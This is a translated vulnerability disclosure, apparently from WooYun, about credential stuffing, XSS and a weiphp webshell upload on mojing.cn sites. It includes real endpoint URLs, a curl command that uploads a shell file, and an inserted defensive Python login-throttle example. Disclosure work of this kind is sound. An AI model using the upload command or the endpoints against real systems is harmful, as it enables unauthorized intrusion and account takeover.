暴风魔镜多处漏洞打包(撞库/xss/Getshell)

Vulnerability title: 暴风魔镜 (Storm Mojing) multiple vulnerabilities bundled (credential stuffing / XSS / getshell)
Vendor: mojing.cn
Author: 千机
Submitted: 2016-05-04 15:36
Published: 2016-06-18 15:40
Vulnerability type: successful intrusion
Severity: high
Self-assessed rank: 20
Status: confirmed by vendor
Tags: webshell

Vulnerability details:

First, credential stuffing: a large number of accounts were successfully compromised because the login endpoint places no limit on the number of login attempts and has no captcha handling.

These accounts could be used to log in.
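The root cause named above is a login endpoint that accepts unlimited attempts with no captcha. As an added illustration (not the vendor's code and not part of the original report), the following Python throttle shows the server-side control that would have stopped the account takeover: lock an account after repeated failures, and demand a captcha once a single source tries many distinct accounts. Window length, thresholds, IPs and account names are assumed, constructed values.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 600        # sliding window (assumed value)
MAX_ACCOUNT_FAILS = 5       # failures per account before lockout (assumed)
MAX_ACCOUNTS_PER_IP = 10    # distinct accounts per source before captcha (assumed)


class LoginThrottle:
    """Per-account lockout plus per-source captcha trigger, evaluated before the password check."""

    def __init__(self, window=WINDOW_SECONDS, max_fails=MAX_ACCOUNT_FAILS,
                 max_accounts=MAX_ACCOUNTS_PER_IP):
        self.window, self.max_fails, self.max_accounts = window, max_fails, max_accounts
        self.account_fails = defaultdict(deque)   # account -> deque of (ts, None)
        self.ip_attempts = defaultdict(deque)     # ip -> deque of (ts, account)

    def _prune(self, dq, now):
        # drop entries that have fallen out of the sliding window
        while dq and dq[0][0] <= now - self.window:
            dq.popleft()

    def decide(self, ip, account, now):
        """Return 'block', 'captcha' or 'allow' for an attempt at time `now`."""
        fails = self.account_fails[account]
        self._prune(fails, now)
        if len(fails) >= self.max_fails:
            return "block"          # account locked: stops brute force on one user
        attempts = self.ip_attempts[ip]
        self._prune(attempts, now)
        if len({acct for _, acct in attempts}) >= self.max_accounts:
            return "captcha"        # one source spraying many accounts: stuffing pattern
        return "allow"

    def record(self, ip, account, now, success):
        self.ip_attempts[ip].append((now, account))
        if success:
            self.account_fails[account].clear()
        else:
            self.account_fails[account].append((now, None))


def simulate(attempts):
    """Replay (ts, ip, account, success) tuples and return the decision made for each."""
    throttle, decisions = LoginThrottle(), []
    for ts, ip, account, success in attempts:
        decision = throttle.decide(ip, account, ts)
        decisions.append(decision)
        if decision != "block":     # blocked attempts never reach password verification
            throttle.record(ip, account, ts, success)
    return decisions


if __name__ == "__main__":
    # constructed traffic: one source trying twelve different accounts within a minute
    spray = [(i * 5, "203.0.113.9", f"user{i:02d}", False) for i in range(12)]
    print(simulate(spray))   # the last two decisions are 'captcha'
```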

Next, XSS: it is in the feedback section of the Mojing developer platform, http://open.mojing.cn/developer/feedback/submit

Then the getshell. This one has been around for a long time, and a new technique has since been learned. The backend at http://weixin.mojing.cn/index.php?s=/Home/User/login/from/1.html is built with weiphp; see the earlier report WooYun: weiphp3.0 WeChat development framework front-end getshell, round two (no login required). First, prepare a shell file locally.

Then upload the shell with the following command: curl -F '[email protected]/*' http://weixin.mojing.cn/index.php?s=/Home/File/uploadPicture/ The shell uploads successfully.

Proof of vulnerability:

Fix plan: fix the issues above. Copyright notice: please credit the source. 千机@WooYun